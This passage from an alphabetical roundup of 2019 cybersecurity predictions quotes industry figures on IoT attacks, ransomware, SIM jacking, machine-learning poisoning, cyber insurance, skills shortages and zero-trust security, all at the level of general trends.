Identity and access management will continue to be a major investment: "As cloud adoption hits critical mass and organisations become more comfortable with, or at least accepting of, multiple SaaS applications (many of which will likely be purchased without IT involvement)...organisations will wake up to the significant cost implications of poorly or incorrectly assigned permissions in a per user licensing model, which will lead to a much more complex identity environment across multiple application providers. This in turn will drive a need for automated tools and delegated administration workflows to ensure IT operations teams don’t become swamped with leavers, movers and joiners requests. Password breaches and phishing attacks will continue to be the biggest threat to most organisations as attackers take advantage of the migration of internal systems and data to external providers. Most users still will ignore good guidance and advice and use the same password everywhere." – Adam Louca, chief technologist for security, Softcat.
Insurance against breaches to grow: "GDPR on top of the existing financial and reputational pressures... will start driving more process maturity as breach insurance starts to be more sophisticated in an actuarial sense. They'll look for specific processes and procedures to be in place to determine rates, and I think that in turn will start to drive better auditing and hopefully better security." – Bill Lummis, technical programme manager, HackerOne.
Insurance - More organisations cyber-insurance savvy: "More and more conversations among peers will start to focus on cyber insurance. ...does it pay or is it even ethical? These (questions) will need to be addressed in 2019." – Jake Moore, cyber security expert, ESET UK.
Insurance rate hike forecast: "Cyber insurance rates will go up because of the increased payouts and risk." – Dmitri Alperovitch, CTO, CrowdStrike.
Intelligence and insight get even bigger: "I’m not just talking about cutting edge developments in areas such as AI and Machine Learning but adding increased intelligence to the whole IT estate. "More and more solutions now offer telemetry that can help with predictive maintenance and support ... the big trends moving forward will be turning that into insights and using it to improve operational efficiency and user experience." – Craig Lodzinski, chief technologist for developing technologies at Softcat.
Internet will be held hostage by attackers: "A hacktivist collective or nation-state will launch a coordinated attack against the infrastructure of the internet in 2019. The protocol that controls the internet (BGP) operates largely on the honour system, and a 2016 DDoS attack against hosting provider Dyn showed that a single attack against a hosting provider or registrar could take down major websites. …. the internet itself is ripe for the taking by someone with the resources to DDoS multiple critical points underpinning the internet or abuse the underlying protocols themselves." – WatchGuard Threat Lab.
Internet - crisis of confidence in the public internet: "In 2019, we expect a growing number of organisations to reconsider their dependence on the public internet for their operations. Cyber-crime is now a common occurrence, and for a variety of business and regulatory reasons the protection of customer data has been escalated from an important concern to a top priority for businesses. For this reason, savvy organisations will begin planning how to migrate their critical data from storage solutions that rely on the public internet, like the cloud, to more secure "cold" networks that are significantly more difficult for hackers to access. Many organisations have moved their operations and storage needs to the cloud and have deemed this a forward-thinking initiative. However, like any system connected to the public internet, cloud networks can be vulnerable to cyberattacks, ransomware, denial of service, and many other malicious exploits. For this reason, any organisation that is serious about protecting its data and other assets must consider moving its online operations onto a more secure private and isolated network." – Phil Celestini, chief security and risk officer, Syiverse.
IOT attack surface and velocity of attacks increases: "The Internet of Things ... literally every facet of our lives is now online... – everything has an IP address. If it’s online, it is susceptible to attack and the larger the attack surface, the greater the real-world consequences will be when things do go wrong. ….any major threat to critical infrastructure will be powered by the devices in our homes….exploiting the woefully inadequate security on smart home devices." – Sean McGrath, privacy expert and cybersecurity advocate, BestVPN.com.
IOT acceleration: "This inevitably will see more hacks and more botnets of previously inert designs. AI turning on human kind is likely to be led by fridges and smart doorbells rather than by Cyberdyne Systems Hunter Killers!" – Stephen Gailey, solutions architect, Exabeam.
Internet of Things (IoT) attacks take advantage of lack regulation: "As lawmakers scramble to come up with a way to regulate the IoT space, attackers will continue to capitalise on their inherent weaknesses. Hackers are becoming better at hijacking IoT products like baby monitors, surveillance cams and other home appliances. And connected medical devices are far from safe either. In fact, body implants that support wireless connectivity may lead to the first ransomware attacks where you need to pay or die. Sound wild? Just remember that, in 2013, former US Vice President Dick Cheney asked his doctors to disable the wireless function in his pacemaker to thwart the potential of terrorists hacking it." – Bitdefender.
IOT devices drive data collection, privacy, and security concerns: "High profile data breaches and eroding faith in major tech companies like Facebook and Twitter will result in a consumer base more privacy minded. Data breaches or abuse of user data, particularly from companies building smart devices, will further erode this trust and allow opportunities for brands that are privacy and security minded to differentiate themselves from the competition. Building consumer trust will be a necessary part of any digital strategy and campaign." – Gabe Morazan, director of product, digital governance, Crownpeak.
Increase in IoT attacks: "The growth in (IOT) devices will very likely mirror the growth in IoT-based malware and has already been evidenced in recent years by the likes Mirai, IoTroop/Reaper and more recently Sharebot attacking routers. The pace of innovation and deployment of network connected systems has outstripped the necessary safeguarding measures – and even more worrying, it is often very difficult to retrofit cyber-security to some of these IoT devices." – Jose Miguel Esparza, head of threat intelligence at Blueliv.
IOT goes cellular: "Another noteworthy trend in the IoT landscape, manufacturers are jumping on the cellular bandwagon, gradually moving their IoTs from WiFi to LTE and from ipv4 to ipv6. While this shift promises increased security, it will likely open up a new can of worms since it’s relatively new ground for the IoT ecosystem." – Bitdefender.
IoT plays catch up on security: "IoT devices or cloud projects are built to do specific things, which can lack security controls, or default to unsecured methods. Which, once traced out, can be difficult or even impossible to rectify. In 2019, more IoT devices and apps will flood the tech markets, and security will continue to play catch up as complexities grow. Security teams need to understand what makes these devices tick before they can wrap security around them, protecting these interactions before information is sent out to insecure areas like the internet. The more security is considered and built-into these devices and processes, the better off companies will be, but it could be a while before security bridges the innovation gap between itself and the rest of technology." – Zach Malone, senior engineer, FireMon.
IOT physical injuries expected: "I expect we will see an increase in physical injuries directly related to the IoT enablement of devices...with remote, and voice enabled functions they become potentially more dangerous. There is an ever increasing probability that these devices will be used as entry points by malicious actors to further compromise corporations for data breaches." – Deral Heiland, IoT research lead, Rapid7.
Iran retaliates: "Iran will launch attacks on the US in retaliation for sanctions." – Dmitri Alperovitch, CTO, CrowdStrike.
MacOS attacks on the rise: "Apple’s share of the desktop market is rising, and malware designed to infect Macs is growing along with it. We project an increase in the number of attacks targeting Mac users, something we are already beginning to see in our internal telemetry. Our data shows not just new macOS-specific malware, but also macOS-specific mechanisms and tools designed to capitalise on Macs post-breach.We’ve already seen this in past APTs that housed Mac-specific components. – Bitdefender.
Machine learning will be tricked: "Machine learning can still be confused or "fuzzed." ...tricked into thinking something is normal and allow access, or even create a DOS by feeding misinformation. …. it can be used as another point of attack or another way to blind an adversary." – Reuven Harrison, CTO, Tufin.
Machine learning will be poisoned: "Machine learning … can also be exploited by cyber-adversaries. By targeting the machine learning process, cyber-criminals will be able to train devices or systems to not apply patches or updates to a particular device, to ignore specific types of applications or behaviours, or to not log specific traffic to evade detection." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
MACROs and fileless attacks will increase: "Attacks leveraging Microsoft Office MACROs will increase in number and scope. MACROs are a feature, not a bug, as the old adage goes. Which makes it the perfect bait for victims prone to social engineering scams – where the attacker convinces the victim to essentially partake in their own abuse. We expect fileless attacks – such as those leveraging powershell and other system-bound formats like reg, mshta etc. – to also increase in scope in the year to come. – Bitdefender.
Mobile attacks on the upsurge: "Fintech services are paving the way to a very profitable new trend for hackers, particularly in the mobile space. The more money they manage on behalf of their users, or the tighter the integration with traditional banking systems, the more attention they will get from cybercrooks who will likely develop new threats targeting these specific services in 2019." – Bitdefender.
Multi-factor authentication hits the mainstream: "... particularly in the small and medium business market….(which) trickles down from the top. Single factor log-ins with overused passwords have been a nightmare for CISOs for years and the boards are finally waking up to new technology, such as personal keys." – Jake Moore, cyber security expert, ESET UK.
Network-level exploits will enter the limelight next year: "They will likely be hyped by social media, if history is any indication. And researchers will have to devote considerable resources to analysing hardware-based implants, hardware backdoors, and hardware design flaws, as well as supply chain compromises in software." – Bitdefender.
Network threat detection returns: "We’ll see the industry start to open its arms back up to network-based threat detection. With the explosion of IoT and the increasing interest and drive for BYOD amongst organisations, network-based threat detection will continue to be important, providing vital security and behaviour related data, to offer visibility that endpoint technology can’t." – SecureAuth.
North Korea still attacking banks: "(It) will continue its financially-motivated attacks on banking institutions and, as its charm offensive is likely to end next year, it may resume destructive attacks in South Korea." – Dmitri Alperovitch, CTO, CrowdStrike.
Objects repurposed: "As organisations ramp up their use of AI to identify unusual activity, cyber-criminals will use more innovative and malicious tactics to ‘blend in’ in 2019. By repurposing standard computing objects for reasons other than their intended purposes – such as unconventional file extensions or online storage services – the threat actor’s arsenal will evolve significantly, and enable them to intelligently camouflage within the corporate network. In 2019, as cyber-criminals look to infiltrate sites under the radar, it’s imperative that enterprises implement comprehensive security solutions that are able to spot disguised profiling attempts." – Bharat Mistry, principal security architect, Trend Micro.
Old threats remain: "The biggest threats to enterprise data assets are the same ones we were worried about last year – and even a decade ago: data protection, compliance, breach avoidance, and – worst case scenario – incident response and remediation. Organisations must create user-friendly policies and procedures and build a maximum level of education and awareness, and ensure sensitive and valuable data remains encrypted at all times." – Jon Fielding, managing director, EMEA Apricorn.
OT/IT convergence will result in the cyber-physical destruction of critical infrastructure: "The concept of Operational Technology (OT) and Information Technology (IT) convergence isn’t new, but as the attack surface continues to increase, so too does the likelihood of an attack successfully causing a severe physical impact. Prior to this convergence, attacks on IT had a relatively limited impact on the physical world—stolen credit card numbers and compromised personal data." – Myles Bray, VP EMEA, ForeScout.
Passwordless society arrives: "Having more human signals such as biometrics, usage analytics and device recognition will remove the reliance on simple and repeat passwords, and in turn, better secure systems. In addition, organisations should move to a discrete and modern identity system that removes any reliance on personal information, such as passwords, to increase security. This will ensure safety as stolen personal information would become worthless on the black market, acting as deterrent to hackers." – Jesper Frederikson, VP, Okta.
Perimeter-based approaches to network security will evolve: "The new WAN landscape next year will demand an elastic edge to extend protection beyond physical and static infrastructure for people, mobile and connected devices on the move." – Todd Kelly, CSO, Cradlepoint.
Privacy breaches & IOT botnets increase, less blockchain interest: "There will be a: "Drastic increase in attention around privacy-related breaches. At least two major botnets discovered on IoT/embedded devices and a falloff in interest for blockchain-related companies/initiatives." – Cody Brocious, security researcher, HackerOne.
Privacy is dead when service is free: "When there is a free online service or application, consumers often have a false assumption the information they share is private. Such free services monetise information and sell it for financial gain. It is a business after all. In 2019, organisations will need to draw a clear line on data sharing and protecting users. – SecureAuth.
Privacy - NO new digital privacy policies expected in US: "US government will NOT adopt any new digital privacy policies despite the recent congressional hearings with Twitter, Facebook, Google etc." – Kevin Lee, trust and safety architect, Sift Science.
Quantum computing puts pressure on crypto-agility: "Next year will see the emergence of the future of security – crypto-agility. As computing power increases, so does the threat to current security protocols. But one notable example here is encryption, the static algorithms of which could be broken by the increased power. Crypto-agility will enable businesses to employ flexible algorithms that can be changed, without significantly changing the system infrastructure, should the original encryption fail. It means businesses can protect their data from future threats including quantum computing, which is still years away, without having to tear up their systems each year as computing power grows." – Jason Hart, CTO, data protection at Gemalto.
Ransomware rise: "Ransomware attacks against vulnerable components of smart city implementations will increase. Cities will be forced to invest in cybersecurity defences to minimise future attacks." – Forrester.
Ransomware damages expected to climb to US$ 11.5 billion: "I expect ransomware to become more sophisticated and less targeted. Distributed, non-specific attacks against technologies rather than organisations will continue to grow. Organisations will need to strengthen their security postures if they are to avoid suffering significant financial, operational and reputational damage." – Shannon Simpson, cyber-security and compliance director, Six Degrees.
Ransomware plateaus - remains a constant threat: "The most profitable form of malware, ransomware …. is no longer growing – it’s plateauing. (It)... has taken a back seat to cryptojacking in the past year as bad actors developed a taste for stealing computing power to generate digital currency while flying under the radar. But an even heftier factor behind ransomware’s stagnation is the emergence of dedicated solutions aimed directly at thwarting this form of malware. There will always be new versions of ransomware, some more complex than others and some harder to catch, but we don’t expect ransomware to take on much bigger proportions." – Bitdefender.
Ransom-hacking due to GDPR: "It has been suggested that some companies would rather pay a ransom to the cyber-criminals to recover their data, rather than admit the attack to the regulator and be hit with a penalty. We expect that 2019 will see both heavier implementation of the regulation, and a rise in ransom-hacking too." – Jose Miguel Esparza, head of threat intelligence at Blueliv.
Ransomware fatigue needs to be resisted: "It’s crucial that businesses don’t let this fatigue overwhelm them, but continue to do everything they can to prepare. If as much time went into ransomware protection and recovery as people spend talking about the dangers of attacks, businesses would find themselves much better prepared overall!" – Caroline Seymour, director, product marketing, Zerto.
Regulation encourages innovation in Europe: "Companies in Europe plan to adopt emerging technologies (hyperconverged infrastructure, container technology, 3D printing, serverless computing, edge computing, artificial intelligence, VR, and blockchain). at a much faster rate (than N America). GPDR..(serves as). an impetus for companies to innovate." – Spiceworks research.
Regulation improved through government and security company cooperation: "...Government and security companies starting to work together to improve regulations to protect companies and individuals. ….Organisations have shown they cannot be trusted with users’ data because it is not secured properly and ends up available to be exploited easily by attackers. GDPR ... other countries will follow suit in 2019. Email-borne attacks on individuals will increase (and) put increasing pressure on social networks and other platforms, as individuals attempt to gain more control over the information available about them online. The response has to include better articulation and a choice upfront about what an individual chooses to expose. Governments will begin to regulate exactly how many personal details organisations can request from individuals, reducing the risk of attacks such as account takeover by cutting back on the amount of data being collected." – BJ Jenkins, president & CEO, Barracuda Networks.
Rock star CIOs or congery of Wizards?: "Gartner believes that Artificial Intelligence in 2019 will be defined by a small clique of ‘wizard’ whose talents won’t scale in the organisation. Infosys Consulting begs to differ: 2019 will be the age of the Rockstart CIO who orchestrates AI across the organisation and manages to capture substantial business value. As AI becomes ever-more central to strategic and operational success, CIOs will have to relinquish their backroom roles and take centre stage – whether they like it or not." – John Gikopoulos, global head for automation and artificial intelligence (AI), Infosys Consulting.
ROI - security teams will need to prove their worth with data: "The security operations teams of today are focused on combating threats, but the team of the future is going to have to prove it with data. In the coming year, we’re going to see more CEOs and boards asking their CISO and security teams to demonstrate the value that they are providing. This means that it will be essential for the CISO to have a way to measure the success of the security team. Think about it like the HR or Finance department: reporting, dashboarding, data storage, aggregation and analysis, and the ability to answer executives’ questions on KPIs quickly are all requirements. In the past, this hasn’t been a practice for the cyber-security side of business, but in the year ahead it will become more prevalent for security teams to be expected to have reporting at their fingertips." – Adam Vincent, CEO and co-founder, ThreatConnect.
Security awareness training improves with automation: "We’ll see security awareness training solutions evolve to provide further automation. This will go beyond making it possible for customers to download everything they need for a single campaign. Automation would ... allow programme administrators to simply select a complete programme from a library after indicating the type of programme and number of campaigns they want, and then everything would be automatically set up and scheduled for the year. Ultimately, this will make it possible for organisations to get their annual security awareness program taken care of in a meaningful, well thought-out way and will allow administrators to focus more on using the data from the results of the campaigns to build a risk profile of the organisation. – Dennis Dillman, VP, product management, PhishLine, Barracuda Networks.
Security by design takes a front seat: "Instead of going through security rules one by one, and needing specific details to work with the rules, security will move towards orchestration and refining things via tagging; like a hashtag on Twitter. These will become the frontrunners for designing policies and security interactions. At the moment, technology is becoming more virtualised – and companies are spinning things up and down in the cloud all the time. But, you need to know the implications of these changes immediately, otherwise data is vulnerable somewhere, or an application won’t function correctly. It sounds like an arduous process, but if you have a general tag with a set of rules attached, you can spin up a virtualised server in the cloud for a specific project without a problem by just properly tagging it – you don’t need to modify your security policy manually as you go." – Zach Malone, senior engineer, FireMon.
Security, Risk, and Trust and Safety Team demand rises: "Budgets for these teams will grow faster than their peers in Legal, Finance and Operations." – Kevin Lee, trust and safety architect, Sift Science.
Security specialist needed by everyone: "Everyone will need a team of application security specialists. But they can’t have them, because "the market" is drained. This gives rise to the proliferation of MSSPs and consultancies, but also hopefully a shift to focus on usability and decision support in security technology, enabling non-security experts to make educated decisions based on advice by their support systems." – Martin Jartelius, CSO, Outpost24.
SIM jacking strikes: "An all-new social engineering attack will hit the mainstream: SIM jacking, whereby criminals convince phone carriers to port a target’s ‘lost’ SIM card to one that’s in the hacker’s possession. This allows the hacker to take control of any part of the target’s online presence that’s associated with their mobile number, and bypass two-factor authentication that involves an SMS code." – Bharat Mistry, principal security architect, Trend Micro.
Skills shortage -technology plays a key role in closing the skills gap: "Security teams need to do more with the limited people they have. Threats are increasing, but the size of teams is often not. Even companies with budgets to hire still have open slots due to the limited supply of trained staff available worldwide. Technology that can perform certain processes without the need for human intervention will be critical to helping teams be more efficient.... When data collection and analytics are a part of this process, the decision makers must have the intelligence needed to make informed decisions. In the coming year, CISOs will be looking to implement more solutions, particularly ones that can be automated and integrate seamlessly with other solutions, to help ease the pain felt by the growing cyber-security skills gap. – Adam Vincent, CEO and co-founder, ThreatConnect.
Skills gap tipping point for the cyber security reached: "(The cyber-security skills) gap is also increasing….with 63 percent of businesses lacking the cyber skills to actually keep threats at bay. As cyber attackers’ tactics become ever more sophisticated and, more importantly, harder to spot, they are needing ever more hours of the good guys’ time to identify and stop. Added to this, many organisations are finding it harder and harder to recruit and retain cyber-specialists to help them keep the bad guys at bay. Which means they’re relying on fewer people with the skills and expertise needed to protect their organisation. These decreasing human resources will come to a head in 2019, where I predict that organisations will stop being able to keep up with investigating these ‘stealth’ cyber attacks." – Michael Flouton, VP, product ops and security strategy, Barracuda Networks.
Sleeper agents with time bombs will sink your company: "It takes companies an average of 206 days to discover a breach. And the threat doesn’t just have to be external: you could have sleeper agents placing time bombs in advance. If done quietly over a period of time, you could lose your backups as well, with no way of tracing the culprit." – David Francis, head of security, KCom.
Social engineering attacks continue to plague organisations: "They are a go-to method for hackers, relying on unwitting, unsuspecting and, at times, careless employees. The key to defending against this type of threat is education; giving employees the skills and knowledge they need to identify potential attacks will be the best way of mitigating the insider threat risk." – Steve Wainwright, managing director EMEA, Skillsoft.
Social media passes its peak: "Professional use of social media such as Twitter and Linkedin will continue to grow, but individuals will turn once again to private, one-to-one channels for interpersonal communication." – Nat Kausik, CEO, Bitglass.
Software bot attack predicted: "2019 will see the first big data breach involving a software-bot, and critical infrastructure will be the big ticket target for hackers." – Paul Trulove, CPO, SailPoint.
Software. Infrastructure as code adoption skyrockets & security as code will appear: "Security is a part of infrastructure definition and the push for full automation needs security to be included. This is related to immutable infrastructure and software defined security trends." – Sergio Loureiro, director cloud solutions, Outpost24.
Spoofing made easier: "Distinguishing fact from fakery has never been harder, and the efforts from social media brands will not be enough to keep up with the deluge of cyber propaganda in 2019. Despite calls for additional regulation, these sites won’t have the time to clear the internet ‘airwaves’ of fake news. Motivation to influence democratic elections will only evolve, and thanks to technology that allows fake news propagators to sway public sentiment – whether that’s AI-enabled voice or video editing tools – cyber-propaganda will have the power to decide the fate of nations." – Bharat Mistry, principal security architect, Trend Micro.
State-employed white hat hackers increasingly "moonlight" with organised crime: "Information security professionals are moonlighting as hackers-for-hire within criminal organisations all over the world. This trend is especially prevalent in Russia, where poorly paid government employees can earn extra income working for powerful and sophisticated criminal networks with ties to the government." – Stan Lowe, CISO, Zscaler.
State-level cyber-attacks force a UN Cyber Security Treaty: "The UN will more forcefully tackle the issue of state-sponsored cyber attacks by enacting a multinational Cyber Security Treaty in 2019." – WatchGuard Threat Lab.
Stock prices impacted by cyber-breaches: ...especially in the technology and cyber-security sector. "Even though high-profile attacks are becoming more common, we haven’t yet seen them damage stock prices to a great extent. But look for this to change in 2019 as organisations complete their digital transformations and oversight bodies have the ability to levy significant fines. Once this happens, breaches will have a much more serious impact on the business, revenue, and customers – and logically, a detrimental impact on stock price." – Stan Lowe, CISO, Zscaler.
Supply chain breaches in web applications get increased focus: "These attacks differ from normal supply chain attacks as instead of targeting code in the manufacturing line, as components are loaded cross domain and across organisations, the website security or large organisations will be broken based on their dependency on small organisation." – Martin Jartelius, CSO, Outpost24
Swarms: Swarm-as-a-Service/A-la-Carte Swarms: "Significant advances in sophisticated attacks powered by swarm-based intelligence technology is bringing us closer to a reality of swarm-based botnets known as hivenets. (They)...will be used to create large swarms of intelligent bots that can operate collaboratively and autonomously. When delivering autonomous, self-learning Swarms-as-a-Service, the amount of direct interaction between a hacker-customer and a black hat entrepreneur will drop dramatically. A-la-Carte Swarms: Resources in a swarm network could be allocated or reallocated to address specific challenges encountered in an attack chain. A swarm that criminal entrepreneurs have already preprogrammed with a range of analysis tools and exploits, combined with self-learning protocols that allow them to work as a group to refine their attack protocols, makes purchasing an attack for cyber-criminals as simple as selecting from an a-la-carte menu." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
Talking the talk but not walking the walk: "Organisations will keep talking about defence in depth but keep building a wall around their perimeter and leaving a very soft network inside. Phishing will continue to rise, and organisations will keep claiming user responsibility for insecurity and gullibility as the problem, however it will still be down to not hardening workstations and internal networks." – Martin Jartelius, CSO, Outpost24.
Technology advancements create new tools and opportunities for hackers: "Whether working for a hostile intelligence service, a multi-national criminal syndicate, or as freelance mercenaries offering network-intrusion-as-a-service, hackers are part and parcel of this community and see the value and potential in new technologies like artificial intelligence (AI) and machine learning in the same way that the mainstream IT industry does – but for different, more sinister purposes. Hackers can exploit AI and machine learning ... to strengthen phishing attacks by using analytics, prediction and simulation functionality to improve the apparent authenticity of scam emails in new ways. Hackers can also use these technologies to improve their understanding of a network’s defences and identify weaknesses to exploit while side-stepping or obscuring their activity from those same defences." – Phil Celestini, chief security and risk officer, Syiverse.
Threat report, FireEye/Mandiant. From deteriorating rules of engagement by state actors to the predicted use of the Tokyo Olympics as a focus for both criminal and political cyber attacks, FireEye Mandiant predictions range over: "Nations developing offensive capabilities • Breaches continuing due to lack of attribution and accountability • The widening skills gap, and less trained experts to fill security roles • Lack of resources, especially for small and medium-sized enterprises • Supply chain as a weakness • Attackers eyeing the cloud, since that’s where the data is headed • Social engineering, considered by many to be the most dangerous threat • Cyber espionage, cyber-crime and other threats to the aviation industry. Regionally the report looks at restructuring of Chinese cyber-espionage • Increase in Iranian threat activity against US. • Use of publicly available malware by major threat actors • Abuse of legitimate services for command and control • Sights set on e-commerce rather than point of sale • Online banking portals in the crosshairs • Reduced use of Flash and Java to improve security • More business email compromise as initial attack vector • Emerging technologies used to evade detection." – FireEye Annual Threat Report.
Unsophisticated attackers will get better at breaking into OT Networks: "But will likely lack the level of sophistication needed to have a significant physical impact. Ever more sophisticated tools and techniques for hacking are available for downloading from the web. This means that the number of unsophisticated hackers able to break into systems will rise – but what they’re able to do once they get in is another question. If you look at Russia’s attacks on the Ukrainian power grid, attackers were able to remain undetected and do reconnaissance work for months. To bring down power for nearly 250,00 customers, they had to thoroughly understand the operations at the targeted plant. That level of sophistication can’t be bought and sold on the internet, which means that the real damage will continue to be done by actors with access to the right skills and resources." – Suzanne Spaulding, adviser, Nozomi Networks, former DHS under secretary.
Vaporworms or fileless malware worms will emerge: "Fileless malware strains will exhibit wormlike properties in 2019, allowing them to self-propagate by exploiting software vulnerabilities. Fileless malware is more difficult for traditional endpoint detection to identify and block because it runs entirely in memory, without ever dropping a file onto the infected system." – WatchGuard Threat Lab.
Wi-Fi-based attacks will surge as new IoT devices enter the workplace: "50 percent of organisations are running IoT devices on their wireless networks, … but only 36 percent of IT professionals are confident in their ability to respond to cyber-attacks on IoT devices. We’ll certainly hear more about security lapses on IoT devices in 2019." – Spiceworks research.
Windows 7 end of life impact: "Windows 7 and Windows 2008 R2 end-of-service in 2019 will drive change in the industry as companies upgrade and replace their aging hardware." – Spiceworks research.
Windows 7 will continue to be an issue: "Especially now that Microsoft is offering extended ‘security update’ support until January 2023. While companies struggle to mitigate the effects of maintaining Windows 7 for another five years, they can count on having to defend against botnets built up of the same (as happened with machines running Windows XP). Companies that delay investing in their IT environments will find themselves defending against insider and outsider attacks made viable by clinging on to vulnerability-ridden operating systems." – Naaman Hart, managed services security engineer, Digital Guardian.
WPA3 Wi-Fi network will be hacked using one of the six Wi-Fi threat categories: "Hackers will use rogue APs, Evil Twin APs, or any of the six known Wi-Fi threat categories (as defined by the Trusted Wireless Environment Framework) to compromise a WPA3 Wi-Fi network, despite enhancements to the new WPA3 encryption standard. Unless more comprehensive security is built into the Wi-Fi infrastructure across the entire industry, users can be fooled into feeling safe with WPA3 while still being susceptible to attacks like Evil Twin APs." – WatchGuard Threat Lab.
Zero-day mining as a service using AIF: "Once AIF (artificial intelligence fuzzing - see Fuzzing, above) is in place, it can be pointed at code within a controlled environment to mine for zero-day exploits. Once this process becomes streamlined, zero-day mining-as-a-service will become enabled, creating customised attacks for individual targets. (Defence) …. will be especially challenging when using the isolated legacy security tools which many organisations have deployed in their networks today." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
Zero trust becomes the driver for digital transformation: "The rapid adoption of cloud services and infrastructure, combined with an increasingly mobile workforce, has forced IT teams to change their approach to security, leading to the emergence of the 'zero trust' concept. Today’s users expect to be able to log onto applications such as Facebook simply, without needing to consider how they are being connected; the same should be said for accessing enterprise networks and applications. The process should be seamless, consistent, and—crucially—invisible to its users. Security must therefore be ‘baked-in,' ensuring that users are seamlessly authenticated however they choose to access services, while ensuring that access is appropriate to their role and requirements." – Nathan Howe, solution architect, Zscaler